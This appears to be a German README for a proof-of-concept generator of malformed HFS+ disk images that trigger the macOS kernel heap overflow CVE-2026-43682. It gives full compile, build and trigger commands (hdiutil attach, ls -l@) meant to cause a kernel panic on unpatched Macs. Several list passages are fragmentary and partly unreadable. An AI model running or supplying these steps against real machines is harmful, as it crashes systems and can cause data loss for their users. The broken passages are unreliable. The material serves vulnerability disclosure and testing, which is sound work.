
Proof-of-Concept-Disk-Image-Generator, der einen fehlerhaften HFS+-Attribute-B-Tree-Schlüssel erzeugt, um den Kernel-Heap-Overflow CVE-2026-43682 unter macOS auszulösen.
Dieses Proof of Concept führt voraussichtlich zu einem Kernel-Panic und einem Neustart eines betroffenen Macs. Verwende es nur auf einem entbehrlichen Testsystem. Die Beweissicherung erfolgte auf Apple Silicon mit macOS Tahoe 26.3 (25D125). Apple hat CVE-2026-43682 in Tahoe 26.6, Sequoia 15.7.8 und Sonoma 14.8.8 behoben.
Das PoC ist ein Disk-Image-Generator, kein Privilege-Escalation-Exploit. Es:
_COMM_PAGE_ASB_TARGET_KERN_VALUE des aktuellen Boots auf Apple Silicon;Die fehlerhafte Kopie ist deterministisch. Ob Probabilistic GZAlloc einen Guard dort platziert, wo der Overwrite sofort einen Fault auslöst, ist es nicht.
hdiutil und xattr.Es sind keine Python-Pakete von Drittanbietern erforderlich.
Der Helper ist optional, aber er macht den Pro-Boot-Wert explizit, bevor das Image generiert wird:
cd poc
clang -O2 -Wall -Wextra check_commpage.c -o check_commpage
./check_commpage
Basis-Image erstellen und dessen Attributes-Tree patchen:
./create_base_dmg.sh base_with_attrs.dmg
python3 craft_attr_poc_asb.py \
base_with_attrs.dmg \
cve-2026-43682.dmg \
2884
Das Python-Skript gibt den Kernel-Target-Flag-Wert desselben Boots und das in das Image geschriebene Muster aus.
Das Anhängen oder anschließende Indizieren des Images kann ausreichen, um den verwundbaren Attributes-Pfad zu erreichen. Der während der Tests verwendete explizite Auslöser war:
hdiutil attach -readonly -nobrowse cve-2026-43682.dmg
ls -l@ /Volumes/AttrPOC/
Auf einem verwundbaren System ist das erwartete Ergebnis ein Kernel Data Abort während der übergroßen B-Tree-Schlüsselkopy. Auf einem behobenen System sollte der fehlerhafte Schlüssel ohne Kernel-Speicherkorruption abgelehnt werden.
Nach einem nicht abstürzenden Durchlauf das Testvolume mit folgendem Befehl aushängen:
hdiutil detach /Volumes/AttrPOC